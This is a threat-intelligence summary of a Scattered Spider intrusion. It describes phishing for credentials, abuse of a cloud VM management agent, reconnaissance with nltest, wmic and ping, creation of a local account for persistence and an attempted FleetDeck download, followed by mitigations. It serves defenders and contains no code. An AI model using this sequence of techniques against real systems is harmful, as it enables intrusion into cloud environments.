Full Report
In May 2024, CrowdStrike observed the cyber threat group Scattered Spider establish a foothold on a cloud-hosted virtual machine (VM) using a cloud service VM management agent. The attackers compromised existing credentials through a phishing campaign to authenticate to the cl...
Analysis Summary
# Threat Actor: Scattered Spider
## Attribution & Identity
* **Name:** Scattered Spider
* **Known Aliases/Associated Groups:** Associated with the threat group 0ktapus (listed as a concurrent type/actor in the source metadata).
## Activity Summary
In May 2024, Scattered Spider established a foothold on a cloud-hosted virtual machine (VM) by exploiting compromised credentials obtained via a phishing campaign. This allowed them to authenticate to the cloud control plane, establish persistence via the cloud service VM management agent, and pivot to the VM itself. The attack demonstrated a multi-domain approach spanning email, cloud management, and the VM environment.
## Tactics, Techniques & Procedures
* **Initial Access:** Compromising existing credentials via a phishing campaign.
* **Authentication:** Authentic use of valid, compromised credentials to access the cloud control plane.
* **Execution/Defense Evasion:** Establishing persistence by executing commands on the cloud-hosted VM using the VM management agent.
* **Reconnaissance:**
* Using the `ping` command to test connectivity to internal and external domains.
* Using the `nltest` command (multiple variations) to identify domain controllers (DCs).
* Using the `wmic` command to identify installed programs on the host.
* **Persistence:** Creating a new local user account on the host.
* **Command and Control (C2):** Attempted download of remote access software.
## Targeting
* **Sectors:** Not explicitly detailed, but the focus on cloud resources suggests environments heavily reliant on cloud infrastructure.
* **Geography:** Not specified in the provided context.
* **Victims:** No specific organizations named.
## Tools & Infrastructure
* **Malware Families Used:** Attempted download and use of **FleetDeck** remote access software.
* **Infrastructure:** The attack utilized **cloud service VM management agents** as a core component of their operational infrastructure/technique.
## Implications
Scattered Spider is actively evolving its tradecraft to leverage legitimate cloud management tools and compromised credentials for initial access and persistence in cloud environments. Their multi-domain approach (email $\rightarrow$ cloud control plane $\rightarrow$ VM) severely challenges traditional, siloed security monitoring solutions, suggesting a high level of operational sophistication in cloud environments.
## Mitigations
* Implement robust multi-factor authentication (MFA) across all cloud control plane access routes to prevent credential reuse attacks following phishing.
* Monitor for unusual command execution via cloud VM management agents.
* Monitor for suspicious use of native host tools like `nltest` and `wmic` immediately following initial access via cloud authentication.
* Strictly control the creation of new local user accounts on cloud resources.
* Restrict the ability to download and run unauthorized remote access software like FleetDeck.